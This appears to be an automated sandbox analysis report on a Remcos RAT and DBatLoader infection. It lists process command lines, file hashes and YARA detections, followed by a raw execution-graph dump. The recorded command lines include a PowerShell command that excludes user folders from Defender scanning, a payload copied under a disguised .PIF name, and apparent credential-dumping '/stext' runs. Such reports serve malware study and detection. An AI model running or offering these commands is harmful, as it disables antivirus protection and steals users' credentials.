                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                                                                                                                                                                                        Imagebase:0x7ff752700000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                        Imagebase:0x7ff752700000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                        Start time:13:59:08
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                        Start time:13:59:12
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF
                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                        File size:29'184 bytes
                                                                                                                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                        Start time:13:59:13
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                        Start time:13:59:15
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                        Imagebase:0x7ff7fb730000
                                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                        Start time:13:59:16
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                        Start time:13:59:16
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                        Start time:13:59:16
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                        Start time:15:41:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Dhuirrkw.PIF"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:1'265'664 bytes
                                                                                                                                                                                        MD5 hash:DD8E3F6AC5C24960B3A69490082C60E1
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001E.00000002.1569609862.00000000040F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 26%, ReversingLabs
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                        Start time:15:41:15
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                        Start time:15:41:15
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Dhuirrkw.PIF"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:1'265'664 bytes
                                                                                                                                                                                        MD5 hash:DD8E3F6AC5C24960B3A69490082C60E1
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000020.00000002.1640507310.0000000004171000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                        Start time:15:41:22
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:16.4%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                          Signature Coverage:28.2%
                                                                                                                                                                                          Total number of Nodes:1462
                                                                                                                                                                                          Total number of Limit Nodes:19
                                                                                                                                                                                          execution_graph 31250 40ca27c 31253 40bd850 31250->31253 31254 40bd858 31253->31254 31254->31254 33744 40a2ee0 QueryPerformanceCounter 31254->33744 31256 40bd87a 31257 40bd884 InetIsOffline 31256->31257 31258 40bd89f 31257->31258 31259 40bd88e 31257->31259 31260 40a44c4 11 API calls 31258->31260 33756 40a44c4 31259->33756 31263 40bd8ae 31260->31263 33747 40a47d0 31263->33747 33745 40a2ef8 GetTickCount 33744->33745 33746 40a2eed 33744->33746 33745->31256 33746->31256 33748 40a47e1 33747->33748 33749 40a481e 33748->33749 33750 40a4807 33748->33750 33771 40a4534 33749->33771 33762 40a4b3c 33750->33762 33753 40a484f 33754 40a4814 33754->33753 33755 40a44c4 11 API calls 33754->33755 33755->33753 33757 40a44c8 33756->33757 33760 40a44d8 33756->33760 33759 40a4534 11 API calls 33757->33759 33757->33760 33758 40a4506 33758->31263 33759->33760 33760->33758 33761 40a2c2c 11 API calls 33760->33761 33761->33758 33763 40a4b49 33762->33763 33770 40a4b79 33762->33770 33764 40a4b72 33763->33764 33766 40a4b55 33763->33766 33767 40a4534 11 API calls 33764->33767 33776 40a2c44 11 API calls 33766->33776 33767->33770 33769 40a4b63 33769->33754 33777 40a4470 33770->33777 33772 40a4538 33771->33772 33773 40a455c 33771->33773 33790 40a2c10 33772->33790 33773->33754 33775 40a4545 33775->33754 33776->33769 33778 40a4476 33777->33778 33780 40a4491 33777->33780 33778->33780 33781 40a2c2c 33778->33781 33780->33769 33782 40a2c3a 33781->33782 33784 40a2c30 33781->33784 33782->33780 33783 40a2d19 33789 40a2ce8 7 API calls 33783->33789 33784->33782 33784->33783 33788 40a6490 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33784->33788 33787 40a2d3a 33787->33780 33788->33783 33789->33787 33791 40a2c27 33790->33791 33793 40a2c14 33790->33793 33791->33775 33792 40a2c1e 33792->33775 33793->33792 33795 40a2d19 33793->33795 33798 40a6490 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33793->33798 33799 40a2ce8 7 API calls 33795->33799 33797 40a2d3a 33797->33775 33798->33795 33799->33797 33800 40c225e 33801 40a47d0 11 API calls 33800->33801 33802 40c227f 33801->33802 35246 40a4910 33802->35246 33805 40c2297 35248 40a475c 33805->35248 33807 40c22b6 35263 40a4668 33807->35263 35247 40a4914 35246->35247 35247->33805 35249 40a4760 35248->35249 35250 40a47c1 35248->35250 35251 40a4768 35249->35251 35252 40a44c4 35249->35252 35251->35250 35254 40a4777 35251->35254 35258 40a44c4 11 API calls 35251->35258 35256 40a4534 11 API calls 35252->35256 35257 40a44d8 35252->35257 35253 40a4506 35253->33807 35255 40a4534 11 API calls 35254->35255 35259 40a4791 35255->35259 35256->35257 35257->35253 35260 40a2c2c 11 API calls 35257->35260 35258->35254 35261 40a44c4 11 API calls 35259->35261 35260->35253 35262 40a47bd 35261->35262 35262->33807 35264 40a466e 35263->35264 35265 40a4e4c 35266 40a4e59 35265->35266 35270 40a4e60 35265->35270 35271 40a4ba8 35266->35271 35280 40a4bc0 35270->35280 35272 40a4bbc 35271->35272 35273 40a4bac SysAllocStringLen 35271->35273 35272->35270 35273->35272 35274 40a4ba0 35273->35274 35275 40a4c33 35274->35275 35276 40a4bd0 35274->35276 35279 40a4c23 SysReAllocStringLen 35274->35279 35275->35270 35277 40a4bd6 SysFreeString 35276->35277 35278 40a4be4 35276->35278 35277->35278 35278->35270 35279->35274 35279->35275 35281 40a4bcc 35280->35281 35282 40a4bc6 SysFreeString 35280->35282 35282->35281 35283 40a1c6c 35284 40a1c7c 35283->35284 35285 40a1d04 35283->35285 35286 40a1cc0 35284->35286 35290 40a1c89 35284->35290 35287 40a1f58 35285->35287 35288 40a1d0d 35285->35288 35289 40a1724 10 API calls 35286->35289 35292 40a1fec 35287->35292 35295 40a1f68 35287->35295 35296 40a1fac 35287->35296 35293 40a1d25 35288->35293 35307 40a1e24 35288->35307 35312 40a1cd7 35289->35312 35291 40a1c94 35290->35291 35331 40a1724 35290->35331 35298 40a1d2c 35293->35298 35299 40a1d48 35293->35299 35304 40a1dfc 35293->35304 35302 40a1724 10 API calls 35295->35302 35301 40a1fb2 35296->35301 35305 40a1724 10 API calls 35296->35305 35297 40a1e7c 35303 40a1724 10 API calls 35297->35303 35320 40a1e95 35297->35320 35311 40a1d79 Sleep 35299->35311 35323 40a1d9c 35299->35323 35300 40a1cfd 35319 40a1f82 35302->35319 35316 40a1f2c 35303->35316 35308 40a1724 10 API calls 35304->35308 35322 40a1fc1 35305->35322 35306 40a1cb9 35307->35297 35310 40a1e55 Sleep 35307->35310 35307->35320 35325 40a1e05 35308->35325 35309 40a1fa7 35310->35297 35313 40a1e6f Sleep 35310->35313 35314 40a1d91 Sleep 35311->35314 35311->35323 35312->35300 35318 40a1a8c 8 API calls 35312->35318 35313->35307 35314->35299 35315 40a1ca1 35315->35306 35355 40a1a8c 35315->35355 35316->35320 35324 40a1a8c 8 API calls 35316->35324 35317 40a1e1d 35318->35300 35319->35309 35326 40a1a8c 8 API calls 35319->35326 35322->35309 35329 40a1a8c 8 API calls 35322->35329 35327 40a1f50 35324->35327 35325->35317 35328 40a1a8c 8 API calls 35325->35328 35326->35309 35328->35317 35330 40a1fe4 35329->35330 35332 40a1968 35331->35332 35333 40a173c 35331->35333 35334 40a1938 35332->35334 35335 40a1a80 35332->35335 35343 40a17cb Sleep 35333->35343 35344 40a174e 35333->35344 35339 40a1947 Sleep 35334->35339 35348 40a1986 35334->35348 35336 40a1a89 35335->35336 35337 40a1684 VirtualAlloc 35335->35337 35336->35315 35340 40a16bf 35337->35340 35341 40a16af 35337->35341 35338 40a175d 35338->35315 35342 40a195d Sleep 35339->35342 35339->35348 35340->35315 35372 40a1644 35341->35372 35342->35334 35343->35344 35347 40a17e4 Sleep 35343->35347 35344->35338 35345 40a182c 35344->35345 35349 40a180a Sleep 35344->35349 35354 40a1838 35345->35354 35378 40a15cc 35345->35378 35347->35333 35350 40a15cc VirtualAlloc 35348->35350 35352 40a19a4 35348->35352 35349->35345 35351 40a1820 Sleep 35349->35351 35350->35352 35351->35344 35352->35315 35354->35315 35356 40a1b6c 35355->35356 35357 40a1aa1 35355->35357 35358 40a1aa7 35356->35358 35360 40a16e8 35356->35360 35357->35358 35362 40a1b13 Sleep 35357->35362 35359 40a1ab0 35358->35359 35365 40a1b4b Sleep 35358->35365 35370 40a1b81 35358->35370 35359->35306 35361 40a1c66 35360->35361 35363 40a1644 2 API calls 35360->35363 35361->35306 35362->35358 35364 40a1b2d Sleep 35362->35364 35366 40a16f5 VirtualFree 35363->35366 35364->35357 35367 40a1b61 Sleep 35365->35367 35365->35370 35368 40a170d 35366->35368 35367->35358 35368->35306 35369 40a1c00 VirtualFree 35369->35306 35370->35369 35371 40a1ba4 35370->35371 35371->35306 35373 40a1681 35372->35373 35374 40a164d 35372->35374 35373->35340 35374->35373 35375 40a164f Sleep 35374->35375 35376 40a1664 35375->35376 35376->35373 35377 40a1668 Sleep 35376->35377 35377->35374 35382 40a1560 35378->35382 35380 40a15d4 VirtualAlloc 35381 40a15eb 35380->35381 35381->35354 35383 40a1500 35382->35383 35383->35380 35384 40cb2f4 35394 40a64dc 35384->35394 35388 40cb322 35399 40ca288 timeSetEvent 35388->35399 35390 40cb32c 35391 40cb33a GetMessageA 35390->35391 35392 40cb32e TranslateMessage DispatchMessageA 35391->35392 35393 40cb34a 35391->35393 35392->35391 35395 40a64e7 35394->35395 35400 40a412c 35395->35400 35398 40a4240 SysFreeString SysReAllocStringLen 35398->35388 35399->35390 35401 40a4172 35400->35401 35402 40a41eb 35401->35402 35403 40a437c 35401->35403 35414 40a40c4 35402->35414 35405 40a43ad 35403->35405 35409 40a43be 35403->35409 35419 40a42f0 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 35405->35419 35408 40a43b7 35408->35409 35410 40a4403 FreeLibrary 35409->35410 35411 40a4427 35409->35411 35410->35409 35412 40a4430 35411->35412 35413 40a4436 ExitProcess 35411->35413 35412->35413 35415 40a40d4 35414->35415 35416 40a4107 35414->35416 35415->35416 35418 40a15cc VirtualAlloc 35415->35418 35420 40a57d8 35415->35420 35416->35398 35418->35415 35419->35408 35421 40a57e8 GetModuleFileNameA 35420->35421 35422 40a5804 35420->35422 35424 40a5a3c GetModuleFileNameA RegOpenKeyExA 35421->35424 35422->35415 35425 40a5abf 35424->35425 35426 40a5a7f RegOpenKeyExA 35424->35426 35442 40a5878 12 API calls 35425->35442 35426->35425 35428 40a5a9d RegOpenKeyExA 35426->35428 35428->35425 35430 40a5b48 lstrcpynA GetThreadLocale GetLocaleInfoA 35428->35430 35429 40a5ae4 RegQueryValueExA 35431 40a5b22 RegCloseKey 35429->35431 35432 40a5b04 RegQueryValueExA 35429->35432 35433 40a5b7f 35430->35433 35434 40a5c62 35430->35434 35431->35422 35432->35431 35433->35434 35436 40a5b8f lstrlenA 35433->35436 35434->35422 35437 40a5ba7 35436->35437 35437->35434 35438 40a5bcc lstrcpynA LoadLibraryExA 35437->35438 35439 40a5bf4 35437->35439 35438->35439 